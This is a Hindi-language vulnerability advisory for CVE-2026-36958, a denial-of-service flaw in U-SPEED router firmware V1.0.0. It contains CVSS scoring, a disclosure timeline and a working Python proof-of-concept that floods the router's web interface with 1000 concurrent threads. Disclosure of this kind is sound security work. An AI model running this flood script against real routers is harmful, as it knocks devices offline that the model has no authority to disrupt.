
CVE-2026-36958 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, U-SPEED राउटर फर्मवेयर में एक डिनायल-ऑफ-सर्विस भेद्यता जो समवर्ती HTTP अनुरोधों के माध्यम से संसाधनों को समाप्त कर देती है, जिससे वेब इंटरफ़ेस अनुत्तरदायी हो जाता है।
CVE ID: CVE-2026-36958 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: U-SPEED उत्पाद: U-SPEED राउटर फर्मवेयर संस्करण: V1.0.0 CWE: CWE-400 - अनियंत्रित संसाधन खपत
U-SPEED राउटर फर्मवेयर V1.0.0 सेवा से वंचित (Denial of Service) की भेद्यता से ग्रस्त है। वेब प्रबंधन इंटरफ़ेस पर यादृच्छिक या गैर-मौजूद एंडपॉइंट्स पर बड़ी संख्या में समवर्ती HTTP अनुरोध भेजकर, एक हमलावर एम्बेडेड Boa HTTP सर्वर में सिस्टम संसाधनों को समाप्त कर सकता है। इससे राउटर का वेब इंटरफ़ेस अनुत्तरदायी हो जाता है और सामान्य संचालन बहाल करने के लिए मैन्युअल रीबूट की आवश्यकता हो सकती है।
CVSS v3.1 स्कोर: 7.5 (उच्च)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| मीट्रिक | मान |
|---|
| हमला वेक्टर | नेटवर्क |
| हमला जटिलता | निम्न |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| गोपनीयता प्रभाव | कोई नहीं |
| अखंडता प्रभाव | कोई नहीं |
| उपलब्धता प्रभाव | उच्च |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
अपेक्षित व्यवहार: सर्वर को समवर्ती कनेक्शनों को सुचारू रूप से संभालना चाहिए। वास्तविक व्यवहार: वेब इंटरफ़ेस अनुत्तरदायी हो जाता है; मैन्युअल रीबूट आवश्यक है।
| दिनांक | घटना |
|---|---|
| 2026-04-29 | भेद्यता की खोज की गई |
| 2026-04-29 | MITRE को रिपोर्ट किया गया |
| 2026-04-29 | CVE-2026-36958 निर्दिष्ट किया गया |
| 2026-04-29 | सार्वजनिक प्रकटीकरण |